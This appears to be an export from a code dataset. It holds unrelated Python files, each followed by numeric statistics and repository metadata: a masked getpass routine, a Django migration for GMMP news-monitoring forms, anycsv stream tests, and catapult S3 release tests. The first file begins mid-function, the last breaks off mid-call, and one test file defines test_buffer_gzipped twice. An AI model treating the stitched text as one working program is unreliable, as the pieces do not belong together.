raise ValueError('mask argument must be a zero- or one-character str')
if mask == '' or sys.stdin is not sys.__stdin__:
# Fall back on getpass if a mask is not needed.
import getpass as gp
return gp.getpass(prompt)
enteredPassword = []
sys.stdout.write(prompt)
sys.stdout.flush()
while True:
key = ord(getch())
if key == 13: # Enter key pressed.
sys.stdout.write('\n')
return ''.join(enteredPassword)
elif key in (8, 127): # Backspace/Del key erases previous output.
if len(enteredPassword) > 0:
# Erases previous character.
sys.stdout.write('\b' + ' ' + '\b')
sys.stdout.flush()
enteredPassword = enteredPassword[:-1]
elif 0 <= key <= 31:
# Do nothing for unprintable characters.
# TODO: Handle Esc, F1-F12, arrow keys, home, end, insert, del, pgup, pgdn
pass
else:
# Key is part of the password; display the mask character.
char = chr(key)
sys.stdout.write(mask)
sys.stdout.flush()
enteredPassword.append(char)
else: # macOS and Linux
import tty, termios
def getch():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def getpass(prompt='Password: ', mask='*'):
if not isinstance(prompt, str):
raise TypeError('prompt argument must be a str, not %s' % (type(prompt).__name__))
if not isinstance(mask, str):
raise TypeError('mask argument must be a zero- or one-character str, not %s' % (type(prompt).__name__))
if len(mask) > 1:
raise ValueError('mask argument must be a zero- or one-character str')
if mask == '' or sys.stdin is not sys.__stdin__:
# Fall back on getpass if a mask is not needed.
import getpass as gp
return gp.getpass(prompt)
enteredPassword = []
sys.stdout.write(prompt)
sys.stdout.flush()
while True:
key = ord(getch())
if key == 13: # Enter key pressed.
sys.stdout.write('\n')
return ''.join(enteredPassword)
elif key in (8, 127): # Backspace/Del key erases previous output.
if len(enteredPassword) > 0:
# Erases previous character.
sys.stdout.write('\b' + ' ' + '\b')
sys.stdout.flush()
enteredPassword = enteredPassword[:-1]
elif 0 <= key <= 31:
# Do nothing for unprintable characters.
# TODO: Handle Esc, F1-F12, arrow keys, home, end, insert, del, pgup, pgdn
pass
else:
# Key is part of the password; display the mask character.
char = chr(key)
sys.stdout.write(mask)
sys.stdout.flush()
enteredPassword.append(char)
| 38.77 | 115 | 0.534692 | 447 | 3,877 | 4.57047 | 0.268456 | 0.061674 | 0.054821 | 0.044053 | 0.848752 | 0.848752 | 0.848752 | 0.848752 | 0.848752 | 0.848752 | 0 | 0.014587 | 0.363425 | 3,877 | 99 | 116 | 39.161616 | 0.813209 | 0.180294 | 0 | 0.76 | 0 | 0 | 0.106363 | 0 | 0 | 0 | 0 | 0.010101 | 0 | 1 | 0.04 | false | 0.24 | 0.066667 | 0 | 0.173333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
56d976f071c11de51cef9fc05ef12c4359f20494 | 24,159 | py | Python | forms/migrations/0052_make_fields_nullable_20200907_0936.py | CodeForAfrica/gmmp | d7ffe2dac16bd57e81bb3555ddea9df1fe7e9ebf | [
"Apache-2.0"
] | 4 | 2020-01-05T09:14:19.000Z | 2022-02-17T03:22:09.000Z | forms/migrations/0052_make_fields_nullable_20200907_0936.py | CodeForAfrica/gmmp | d7ffe2dac16bd57e81bb3555ddea9df1fe7e9ebf | [
"Apache-2.0"
] | 68 | 2019-12-23T02:19:55.000Z | 2021-04-23T06:13:36.000Z | forms/migrations/0052_make_fields_nullable_20200907_0936.py | CodeForAfrica/gmmp | d7ffe2dac16bd57e81bb3555ddea9df1fe7e9ebf | [
"Apache-2.0"
] | 2 | 2020-11-07T12:23:21.000Z | 2021-11-07T18:21:31.000Z | # Generated by Django 2.2.16 on 2020-09-07 09:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('forms', '0051_increate_people_in_the_news_age'),
]
operations = [
migrations.AlterField(
model_name='internetnewsperson',
name='age',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Do not know'), (1, '(1) 12 and under'), (2, '(2) 13-18'), (3, '(3) 19-34'), (4, '(4) 35-49'), (5, '(5) 50-64'), (6, '(6) 65-79'), (7, '(7) 80 years or more')], null=True, verbose_name='(13) Age (person appears)'),
),
migrations.AlterField(
model_name='internetnewsperson',
name='family_role',
field=models.CharField(choices=[('Y', '(1) Yes'), ('N', '(2) No')], default='N', help_text="Code yes only if the word 'wife', 'husband' etc is actually used to describe the person.", max_length=1, verbose_name='(16) Family Role Given?'),
),
migrations.AlterField(
model_name='internetnewsperson',
name='function',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Do not know'), (1, '(1) Subject'), (2, '(2) Spokesperson'), (3, '(3) Expert or commentator'), (4, '(4) Personal Experience'), (5, '(5) Eye Witness'), (6, '(6) Popular Opinion'), (7, '(7) Other')], null=True, verbose_name='(15) Function in the news story'),
),
migrations.AlterField(
model_name='internetnewsperson',
name='is_photograph',
field=models.PositiveIntegerField(blank=True, choices=[(1, '(1) Yes'), (2, '(2) No'), (3, '(3) Do not know')], verbose_name='(21) Is there a photograph of the person in the story?'),
),
migrations.AlterField(
model_name='internetnewsperson',
name='is_quoted',
field=models.CharField(choices=[('Y', '(1) Yes'), ('N', '(2) No')], default='N', help_text='A person is <strong>directly quoted</strong> if their own words are printed, e.g. "The war against terror is our first priority" said President Bush.<br/>If the story paraphrases what the person said, that is not a direct quote, e.g. President Bush said that top priority would be given to fighting the war against terror.', max_length=1, verbose_name='(20) Is the person directly quoted'),
),
migrations.AlterField(
model_name='internetnewsperson',
name='occupation',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Not stated'), (1, '(1) Royalty, monarch, deposed monarch, etc.'), (2, '(2) Politician/ member of parliament, ...'), (3, '(3) Government employee, public servant, spokesperson, etc.'), (4, '(4) Police, military, para-military, militia, fire officer'), (5, '(5) Academic expert, lecturer, teacher'), (6, '(6) Doctor, dentist, health specialist'), (7, '(7) Health worker, social worker, childcare worker'), (8, '(8) Science/ technology professional, engineer, etc.'), (9, '(9) Media professional, journalist, film-maker, etc.'), (10, '(10) Lawyer, judge, magistrate, legal advocate, etc.'), (11, '(11) Business person, exec, manager, stock broker...'), (12, '(12) Office or service worker, non-management worker'), (13, '(13) Tradesperson, artisan, labourer, truck driver, etc.'), (14, '(14) Agriculture, mining, fishing, forestry'), (15, '(15) Religious figure, priest, monk, rabbi, mullah, nun'), (16, '(16) Activist or worker in civil society org., NGO, trade union'), (17, '(17) Sex worker'), (18, '(18) Celebrity, artist, actor, writer, singer, TV personality'), (19, '(19) Sportsperson, athlete, player, coach, referee'), (20, '(20) Student, pupil, schoolchild'), (21, '(21) Homemaker, parent (male or female)) only if no other occupation is given e.g. doctor/mother=code 6'), (22, '(22) Child, young person no other occupation given'), (23, '(23) Villager or resident no other occupation given'), (24, '(24) Retired person, pensioner no other occupation given'), (25, '(25) Criminal, suspect no other occupation given'), (26, '(26) Unemployed no other occupation given'), (27, '(27) Other only as last resort & explain')], null=True, verbose_name='(14) Occupation or Position'),
),
migrations.AlterField(
model_name='internetnewsperson',
name='sex',
field=models.PositiveIntegerField(blank=True, choices=[(1, '(1) Female'), (2, '(2) Male'), (3, '(3) Other (transgender, etc.)'), (4, '(4) Do not know')], null=True, verbose_name='(12) Sex'),
),
migrations.AlterField(
model_name='internetnewsperson',
name='victim_or_survivor',
field=models.CharField(choices=[('Y', '(1) Yes'), ('N', '(2) No')], default='N', help_text="You should code a person as a victim <strong>either</strong> if the word 'victim' is used to describe her/him, <strong>or</strong> if the story Implies that the person is a victim - e.g. by using language or images that evoke particular emotions such as shock, horror, pity for the person.<br/>You should code a person as a survivor <strong>either</strong> if the word 'survivor' is used to describe her/him, <strong>or</strong> if the story implies that the person is a survivor - e.g. by using language or images that evoke particular emotions such as admiration or respect for the person.", max_length=1, verbose_name='(17) Does the story identify the person as either a victim or survivor?'),
),
migrations.AlterField(
model_name='internetnewssheet',
name='webpage_layer_no',
field=models.PositiveIntegerField(blank=True, help_text='Webpage Layer Number. Homepage=1, One click away=2, Five clicks away= 5, etc. Note that if a story appears on the front page, code with 1', null=True, verbose_name='(1) Webpage Layer Number'),
),
migrations.AlterField(
model_name='newspaperperson',
name='age',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Do not know'), (1, '(1) 12 and under'), (2, '(2) 13-18'), (3, '(3) 19-34'), (4, '(4) 35-49'), (5, '(5) 50-64'), (6, '(6) 65-79'), (7, '(7) 80 years or more')], null=True, verbose_name='(11) Age (person appears)'),
),
migrations.AlterField(
model_name='newspaperperson',
name='family_role',
field=models.CharField(choices=[('Y', '(1) Yes'), ('N', '(2) No')], default='N', help_text="Code yes only if the word 'wife', 'husband' etc is actually used to describe the person.", max_length=1, verbose_name='(14) Family Role Given?'),
),
migrations.AlterField(
model_name='newspaperperson',
name='function',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Do not know'), (1, '(1) Subject'), (2, '(2) Spokesperson'), (3, '(3) Expert or commentator'), (4, '(4) Personal Experience'), (5, '(5) Eye Witness'), (6, '(6) Popular Opinion'), (7, '(7) Other')], null=True, verbose_name='(13) Function in the news story'),
),
migrations.AlterField(
model_name='newspaperperson',
name='is_photograph',
field=models.PositiveIntegerField(blank=True, choices=[(1, '(1) Yes'), (2, '(2) No'), (3, '(3) Do not know')], verbose_name='(19) Is there a photograph of the person in the story?'),
),
migrations.AlterField(
model_name='newspaperperson',
name='is_quoted',
field=models.CharField(choices=[('Y', '(1) Yes'), ('N', '(2) No')], default='N', help_text='A person is <strong>directly quoted</strong> if their own words are printed, e.g. "The war against terror is our first priority" said President Bush.<br/>If the story paraphrases what the person said, that is not a direct quote, e.g. President Bush said that top priority would be given to fighting the war against terror.', max_length=1, verbose_name='(18) Is the person directly quoted'),
),
migrations.AlterField(
model_name='newspaperperson',
name='occupation',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Not stated'), (1, '(1) Royalty, monarch, deposed monarch, etc.'), (2, '(2) Politician/ member of parliament, ...'), (3, '(3) Government employee, public servant, spokesperson, etc.'), (4, '(4) Police, military, para-military, militia, fire officer'), (5, '(5) Academic expert, lecturer, teacher'), (6, '(6) Doctor, dentist, health specialist'), (7, '(7) Health worker, social worker, childcare worker'), (8, '(8) Science/ technology professional, engineer, etc.'), (9, '(9) Media professional, journalist, film-maker, etc.'), (10, '(10) Lawyer, judge, magistrate, legal advocate, etc.'), (11, '(11) Business person, exec, manager, stock broker...'), (12, '(12) Office or service worker, non-management worker'), (13, '(13) Tradesperson, artisan, labourer, truck driver, etc.'), (14, '(14) Agriculture, mining, fishing, forestry'), (15, '(15) Religious figure, priest, monk, rabbi, mullah, nun'), (16, '(16) Activist or worker in civil society org., NGO, trade union'), (17, '(17) Sex worker'), (18, '(18) Celebrity, artist, actor, writer, singer, TV personality'), (19, '(19) Sportsperson, athlete, player, coach, referee'), (20, '(20) Student, pupil, schoolchild'), (21, '(21) Homemaker, parent (male or female)) only if no other occupation is given e.g. doctor/mother=code 6'), (22, '(22) Child, young person no other occupation given'), (23, '(23) Villager or resident no other occupation given'), (24, '(24) Retired person, pensioner no other occupation given'), (25, '(25) Criminal, suspect no other occupation given'), (26, '(26) Unemployed no other occupation given'), (27, '(27) Other only as last resort & explain')], null=True, verbose_name='(12) Occupation or Position'),
),
migrations.AlterField(
model_name='newspaperperson',
name='sex',
field=models.PositiveIntegerField(blank=True, choices=[(1, '(1) Female'), (2, '(2) Male'), (3, '(3) Other (transgender, etc.)'), (4, '(4) Do not know')], null=True, verbose_name='(10) Sex'),
),
migrations.AlterField(
model_name='newspaperperson',
name='victim_or_survivor',
field=models.CharField(choices=[('Y', '(1) Yes'), ('N', '(2) No')], default='N', help_text="You should code a person as a victim <strong>either</strong> if the word 'victim' is used to describe her/him, <strong>or</strong> if the story Implies that the person is a victim - e.g. by using language or images that evoke particular emotions such as shock, horror, pity for the person.<br/>You should code a person as a survivor <strong>either</strong> if the word 'survivor' is used to describe her/him, <strong>or</strong> if the story implies that the person is a survivor - e.g. by using language or images that evoke particular emotions such as admiration or respect for the person.", max_length=1, verbose_name='(15) Does the story identify the person as either a victim or survivor?'),
),
migrations.AlterField(
model_name='newspapersheet',
name='page_number',
field=models.PositiveIntegerField(blank=True, help_text='Write in the number of the page on which the story begins. Story appears on first page = 1, Seventh page = 7, etc.', null=True, verbose_name='(1) Page Number'),
),
migrations.AlterField(
model_name='newspapersheet',
name='space',
field=models.PositiveIntegerField(blank=True, choices=[(1, '(1) Full page'), (2, '(2) Half page'), (3, '(3) One third page'), (4, '(4) Quarter page'), (5, '(5) Less than quarter page')], null=True, verbose_name='(4) Space'),
),
migrations.AlterField(
model_name='radioperson',
name='family_role',
field=models.CharField(choices=[('Y', '(1) Yes'), ('N', '(2) No')], default='N', help_text="Code yes only if the word 'wife', 'husband' etc is actually used to describe the person.", max_length=1, verbose_name='(13) Family Role Given?'),
),
migrations.AlterField(
model_name='radioperson',
name='function',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Do not know'), (1, '(1) Subject'), (2, '(2) Spokesperson'), (3, '(3) Expert or commentator'), (4, '(4) Personal Experience'), (5, '(5) Eye Witness'), (6, '(6) Popular Opinion'), (7, '(7) Other')], null=True, verbose_name='(12) Function in the news story'),
),
migrations.AlterField(
model_name='radioperson',
name='occupation',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Not stated'), (1, '(1) Royalty, monarch, deposed monarch, etc.'), (2, '(2) Politician/ member of parliament, ...'), (3, '(3) Government employee, public servant, spokesperson, etc.'), (4, '(4) Police, military, para-military, militia, fire officer'), (5, '(5) Academic expert, lecturer, teacher'), (6, '(6) Doctor, dentist, health specialist'), (7, '(7) Health worker, social worker, childcare worker'), (8, '(8) Science/ technology professional, engineer, etc.'), (9, '(9) Media professional, journalist, film-maker, etc.'), (10, '(10) Lawyer, judge, magistrate, legal advocate, etc.'), (11, '(11) Business person, exec, manager, stock broker...'), (12, '(12) Office or service worker, non-management worker'), (13, '(13) Tradesperson, artisan, labourer, truck driver, etc.'), (14, '(14) Agriculture, mining, fishing, forestry'), (15, '(15) Religious figure, priest, monk, rabbi, mullah, nun'), (16, '(16) Activist or worker in civil society org., NGO, trade union'), (17, '(17) Sex worker'), (18, '(18) Celebrity, artist, actor, writer, singer, TV personality'), (19, '(19) Sportsperson, athlete, player, coach, referee'), (20, '(20) Student, pupil, schoolchild'), (21, '(21) Homemaker, parent (male or female)) only if no other occupation is given e.g. doctor/mother=code 6'), (22, '(22) Child, young person no other occupation given'), (23, '(23) Villager or resident no other occupation given'), (24, '(24) Retired person, pensioner no other occupation given'), (25, '(25) Criminal, suspect no other occupation given'), (26, '(26) Unemployed no other occupation given'), (27, '(27) Other only as last resort & explain')], null=True, verbose_name='(11) Occupation or Position'),
),
migrations.AlterField(
model_name='radioperson',
name='sex',
field=models.PositiveIntegerField(blank=True, choices=[(1, '(1) Female'), (2, '(2) Male'), (3, '(3) Other (transgender, etc.)'), (4, '(4) Do not know')], null=True, verbose_name='(10) Sex'),
),
migrations.AlterField(
model_name='radioperson',
name='victim_or_survivor',
field=models.CharField(choices=[('Y', '(1) Yes'), ('N', '(2) No')], default='N', help_text="You should code a person as a victim <strong>either</strong> if the word 'victim' is used to describe her/him, <strong>or</strong> if the story Implies that the person is a victim - e.g. by using language or images that evoke particular emotions such as shock, horror, pity for the person.<br/>You should code a person as a survivor <strong>either</strong> if the word 'survivor' is used to describe her/him, <strong>or</strong> if the story implies that the person is a survivor - e.g. by using language or images that evoke particular emotions such as admiration or respect for the person.", max_length=1, verbose_name='(14) Does the story identify the person as either a victim or survivor?'),
),
migrations.AlterField(
model_name='radiosheet',
name='item_number',
field=models.PositiveIntegerField(blank=True, help_text='Write in the number that describes the position of the story within the newscast. E.g. the first story in the newscast is item 1; the seventh story is item 7.', null=True, verbose_name='(1) Item Number'),
),
migrations.AlterField(
model_name='televisionperson',
name='age',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Do not know'), (1, '(1) 12 and under'), (2, '(2) 13-18'), (3, '(3) 19-34'), (4, '(4) 35-49'), (5, '(5) 50-64'), (6, '(6) 65-79'), (7, '(7) 80 years or more')], null=True, verbose_name='(12) Age (person appears)'),
),
migrations.AlterField(
model_name='televisionperson',
name='family_role',
field=models.CharField(choices=[('Y', '(1) Yes'), ('N', '(2) No')], default='N', help_text="Code yes only if the word 'wife', 'husband' etc is actually used to describe the person.", max_length=1, verbose_name='(15) Family Role Given?'),
),
migrations.AlterField(
model_name='televisionperson',
name='function',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Do not know'), (1, '(1) Subject'), (2, '(2) Spokesperson'), (3, '(3) Expert or commentator'), (4, '(4) Personal Experience'), (5, '(5) Eye Witness'), (6, '(6) Popular Opinion'), (7, '(7) Other')], null=True, verbose_name='(14) Function in the news story'),
),
migrations.AlterField(
model_name='televisionperson',
name='occupation',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Not stated'), (1, '(1) Royalty, monarch, deposed monarch, etc.'), (2, '(2) Politician/ member of parliament, ...'), (3, '(3) Government employee, public servant, spokesperson, etc.'), (4, '(4) Police, military, para-military, militia, fire officer'), (5, '(5) Academic expert, lecturer, teacher'), (6, '(6) Doctor, dentist, health specialist'), (7, '(7) Health worker, social worker, childcare worker'), (8, '(8) Science/ technology professional, engineer, etc.'), (9, '(9) Media professional, journalist, film-maker, etc.'), (10, '(10) Lawyer, judge, magistrate, legal advocate, etc.'), (11, '(11) Business person, exec, manager, stock broker...'), (12, '(12) Office or service worker, non-management worker'), (13, '(13) Tradesperson, artisan, labourer, truck driver, etc.'), (14, '(14) Agriculture, mining, fishing, forestry'), (15, '(15) Religious figure, priest, monk, rabbi, mullah, nun'), (16, '(16) Activist or worker in civil society org., NGO, trade union'), (17, '(17) Sex worker'), (18, '(18) Celebrity, artist, actor, writer, singer, TV personality'), (19, '(19) Sportsperson, athlete, player, coach, referee'), (20, '(20) Student, pupil, schoolchild'), (21, '(21) Homemaker, parent (male or female)) only if no other occupation is given e.g. doctor/mother=code 6'), (22, '(22) Child, young person no other occupation given'), (23, '(23) Villager or resident no other occupation given'), (24, '(24) Retired person, pensioner no other occupation given'), (25, '(25) Criminal, suspect no other occupation given'), (26, '(26) Unemployed no other occupation given'), (27, '(27) Other only as last resort & explain')], null=True, verbose_name='(13) Occupation or Position'),
),
migrations.AlterField(
model_name='televisionperson',
name='sex',
field=models.PositiveIntegerField(blank=True, choices=[(1, '(1) Female'), (2, '(2) Male'), (3, '(3) Other (transgender, etc.)'), (4, '(4) Do not know')], null=True, verbose_name='(11) Sex'),
),
migrations.AlterField(
model_name='televisionperson',
name='victim_or_survivor',
field=models.CharField(choices=[('Y', '(1) Yes'), ('N', '(2) No')], default='N', help_text="You should code a person as a victim <strong>either</strong> if the word 'victim' is used to describe her/him, <strong>or</strong> if the story Implies that the person is a victim - e.g. by using language or images that evoke particular emotions such as shock, horror, pity for the person.<br/>You should code a person as a survivor <strong>either</strong> if the word 'survivor' is used to describe her/him, <strong>or</strong> if the story implies that the person is a survivor - e.g. by using language or images that evoke particular emotions such as admiration or respect for the person.", max_length=1, verbose_name='(16) Does the story identify the person as either a victim or survivor?'),
),
migrations.AlterField(
model_name='televisionsheet',
name='item_number',
field=models.PositiveIntegerField(blank=True, help_text='Write in the number that describes the position of the story within the newscast. E.g. the first story in the newscast is item 1; the seventh story is item 7.', null=True, verbose_name='(1) Item Number'),
),
migrations.AlterField(
model_name='twitterperson',
name='age',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Do not know'), (1, '(1) 12 and under'), (2, '(2) 13-18'), (3, '(3) 19-34'), (4, '(4) 35-49'), (5, '(5) 50-64'), (6, '(6) 65-79'), (7, '(7) 80 years or more')], null=True, verbose_name='(10) Age (person appears)'),
),
migrations.AlterField(
model_name='twitterperson',
name='function',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Do not know'), (1, '(1) Subject'), (2, '(2) Spokesperson'), (3, '(3) Expert or commentator'), (4, '(4) Personal Experience'), (5, '(5) Eye Witness'), (6, '(6) Popular Opinion'), (7, '(7) Other')], null=True, verbose_name='(12) Function in the news story'),
),
migrations.AlterField(
model_name='twitterperson',
name='is_photograph',
field=models.PositiveIntegerField(blank=True, choices=[(1, '(1) Yes'), (2, '(2) No'), (3, '(3) Do not know')], verbose_name='(13) Is there a photograph of the person in the story?'),
),
migrations.AlterField(
model_name='twitterperson',
name='occupation',
field=models.PositiveIntegerField(blank=True, choices=[(0, '(0) Not stated'), (1, '(1) Royalty, monarch, deposed monarch, etc.'), (2, '(2) Politician/ member of parliament, ...'), (3, '(3) Government employee, public servant, spokesperson, etc.'), (4, '(4) Police, military, para-military, militia, fire officer'), (5, '(5) Academic expert, lecturer, teacher'), (6, '(6) Doctor, dentist, health specialist'), (7, '(7) Health worker, social worker, childcare worker'), (8, '(8) Science/ technology professional, engineer, etc.'), (9, '(9) Media professional, journalist, film-maker, etc.'), (10, '(10) Lawyer, judge, magistrate, legal advocate, etc.'), (11, '(11) Business person, exec, manager, stock broker...'), (12, '(12) Office or service worker, non-management worker'), (13, '(13) Tradesperson, artisan, labourer, truck driver, etc.'), (14, '(14) Agriculture, mining, fishing, forestry'), (15, '(15) Religious figure, priest, monk, rabbi, mullah, nun'), (16, '(16) Activist or worker in civil society org., NGO, trade union'), (17, '(17) Sex worker'), (18, '(18) Celebrity, artist, actor, writer, singer, TV personality'), (19, '(19) Sportsperson, athlete, player, coach, referee'), (20, '(20) Student, pupil, schoolchild'), (21, '(21) Homemaker, parent (male or female)) only if no other occupation is given e.g. doctor/mother=code 6'), (22, '(22) Child, young person no other occupation given'), (23, '(23) Villager or resident no other occupation given'), (24, '(24) Retired person, pensioner no other occupation given'), (25, '(25) Criminal, suspect no other occupation given'), (26, '(26) Unemployed no other occupation given'), (27, '(27) Other only as last resort & explain')], null=True, verbose_name='(11) Occupation or Position'),
),
migrations.AlterField(
model_name='twitterperson',
name='sex',
field=models.PositiveIntegerField(blank=True, choices=[(1, '(1) Female'), (2, '(2) Male'), (3, '(3) Other (transgender, etc.)'), (4, '(4) Do not know')], null=True, verbose_name='(9) Sex'),
),
]
| 121.40201 | 1,758 | 0.640176 | 3,249 | 24,159 | 4.721453 | 0.0988 | 0.04824 | 0.0603 | 0.069948 | 0.96558 | 0.960365 | 0.921382 | 0.883768 | 0.875489 | 0.858475 | 0 | 0.046144 | 0.191771 | 24,159 | 198 | 1,759 | 122.015152 | 0.739476 | 0.001904 | 0 | 0.78125 | 1 | 0.098958 | 0.600929 | 0.009124 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.005208 | 0 | 0.020833 | 0.010417 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
71163ba5114de73e315124f71be5ef566aff641b | 3,548 | py | Python | tests/test_bufferedio.py | jumbrich/pyanycsv | ebffa9ac066721d107557619833c138db5e61109 | [
"MIT"
] | null | null | null | tests/test_bufferedio.py | jumbrich/pyanycsv | ebffa9ac066721d107557619833c138db5e61109 | [
"MIT"
] | null | null | null | tests/test_bufferedio.py | jumbrich/pyanycsv | ebffa9ac066721d107557619833c138db5e61109 | [
"MIT"
] | null | null | null | from anycsv.exceptions import FileSizeException
from anycsv.io_tools import BufferedAutoEncodingStream
from tests.test_encoding_detection import _create_table
def test_read_all(tmpdir):
p = tmpdir.mkdir("tmp.csvs").mkdir("data")
csv = _create_table(p, rows=200)
ios = BufferedAutoEncodingStream(csv, max_buffer=50)
for i, line in enumerate(ios):
pass
assert i == 200
assert ios.digest is not None
def test_file(tmpdir):
p = tmpdir.mkdir("tmp.csvs").mkdir("data")
csv = _create_table(p, rows=200)
ios = BufferedAutoEncodingStream(csv, max_buffer=50)
first_line = ios.readline()
ios.reset()
re_first_line = ios.readline()
assert first_line == re_first_line
def test_buffer_not_reset(tmpdir):
p = tmpdir.mkdir("tmp.csvs").mkdir("data")
csv = _create_table(p, rows=200)
ios = BufferedAutoEncodingStream(csv, max_buffer=10)
[next(ios) for _ in range(12)]
try:
ios.reset()
except Exception as e:
assert isinstance(e, IOError)
def test_max_file_size(tmpdir):
p = tmpdir.mkdir("tmp.csvs").mkdir("data")
csv = _create_table(p, rows=200)
ios = BufferedAutoEncodingStream(csv, max_buffer=10, max_file_size=1024)
try:
for row in ios:
pass
except Exception as e:
assert isinstance(e, FileSizeException)
def test_file_gzipped(tmpdir):
p = tmpdir.mkdir("tmp.csvs").mkdir("data")
csv = _create_table(p, rows=200, gzipped=True)
ios = BufferedAutoEncodingStream(csv, max_buffer=50)
first_line = ios.readline()
ios.reset()
re_first_line = ios.readline()
assert first_line == re_first_line
def test_http(tmpdir):
csv = "https://datascience.ai.wu.ac.at/ws1718_dataprocessing1_1823/data/allcampusrooms.csv"
ios = BufferedAutoEncodingStream(csv, max_buffer=50)
first_line = ios.readline()
ios.reset()
re_first_line = ios.readline()
assert first_line == re_first_line
def test_buffer(tmpdir):
p = tmpdir.mkdir("tmp.csvs").mkdir("data")
csv = _create_table(p, rows=200)
max_buffer=50
ios = BufferedAutoEncodingStream(csv, max_buffer=max_buffer)
c=0
cnt=b''
for l in ios:
c+=1
cnt+=l
if c>=max_buffer:
break
ios.reset()
c = 0
re_cnt = b''
for l in ios:
c += 1
re_cnt += l
if c >= max_buffer:
break
assert len(cnt) == len(re_cnt)
assert cnt == re_cnt
def test_buffer_gzipped(tmpdir):
p = tmpdir.mkdir("tmp.csvs").mkdir("data")
csv = _create_table(p, rows=200, gzipped=True)
max_buffer=50
ios = BufferedAutoEncodingStream(csv, max_buffer=max_buffer)
c=0
cnt=b''
for l in ios:
c+=1
cnt+=l
if c>=max_buffer:
break
ios.reset()
c = 0
re_cnt = b''
for l in ios:
c += 1
re_cnt += l
if c >= max_buffer:
break
assert len(cnt) == len(re_cnt)
assert cnt == re_cnt
def test_buffer_gzipped(tmpdir):
csv = "https://datascience.ai.wu.ac.at/ws1718_dataprocessing1_1823/data/allcampusrooms.csv"
max_buffer=50
ios = BufferedAutoEncodingStream(csv, max_buffer=max_buffer)
c=0
cnt=b''
for l in ios:
c+=1
cnt+=l
if c>=max_buffer:
break
ios.reset()
c = 0
re_cnt = b''
for l in ios:
c += 1
re_cnt += l
if c >= max_buffer:
break
assert len(cnt) == len(re_cnt)
assert cnt == re_cnt
| 21.119048 | 95 | 0.620913 | 496 | 3,548 | 4.252016 | 0.165323 | 0.089616 | 0.056899 | 0.14936 | 0.833096 | 0.833096 | 0.833096 | 0.799905 | 0.799905 | 0.799905 | 0 | 0.029942 | 0.265784 | 3,548 | 167 | 96 | 21.245509 | 0.779655 | 0 | 0 | 0.837607 | 0 | 0 | 0.070502 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.076923 | false | 0.017094 | 0.025641 | 0 | 0.102564 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8556fc683c4b5ed07365b7ad203a7a3216e98e36 | 17,186 | py | Python | tests/test_release.py | alexanderphoenix/catapult | e47463907aad84e2eb11ef2ea75be9beb37bb421 | [
"MIT"
] | null | null | null | tests/test_release.py | alexanderphoenix/catapult | e47463907aad84e2eb11ef2ea75be9beb37bb421 | [
"MIT"
] | null | null | null | tests/test_release.py | alexanderphoenix/catapult | e47463907aad84e2eb11ef2ea75be9beb37bb421 | [
"MIT"
] | null | null | null | import json
from datetime import datetime
from unittest import mock
import boto3
import pytz
from freezegun import freeze_time
from invoke import MockContext, Result
from moto import mock_s3
from testfixtures import compare
from catapult import release
# Mock default bucket name to stop the tests from using a real
# bucket by mistake
_PATCHER = mock.patch("catapult.utils.CONFIG", {"release": {"s3_bucket": "test"}})
def setUpModule():
_PATCHER.start()
def tearDownModule():
_PATCHER.stop()
@mock_s3
@freeze_time("2018-01-01T12:00:00")
def test_get_release_from_bucket():
"""
Gets the release from an object stored in a S3 bucket.
"""
s3 = boto3.resource("s3")
client = boto3.client("s3")
s3.create_bucket(Bucket="test")
bucket = s3.BucketVersioning("test")
bucket.enable()
resp = client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 2,
"commit": "0123456789abcdef",
"changelog": "some changes",
"image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
"author": "author@example.com",
}
),
)
expected = release.Release(
version=2,
commit="0123456789abcdef",
changelog="some changes",
version_id=resp["VersionId"],
image="sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
timestamp=datetime(2018, 1, 1, 12, 0, 0, tzinfo=pytz.utc),
author="author@example.com",
)
r = release._get_release(client, "test", "test-app", None)
compare(expected, r)
@mock_s3
def test_get_latest_release():
"""
Gets the latest release when the object's Version ID is not specified.
"""
s3 = boto3.resource("s3")
client = boto3.client("s3")
s3.create_bucket(Bucket="test")
bucket = s3.BucketVersioning("test")
bucket.enable()
with freeze_time("2018-01-01T12:00:00"):
client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
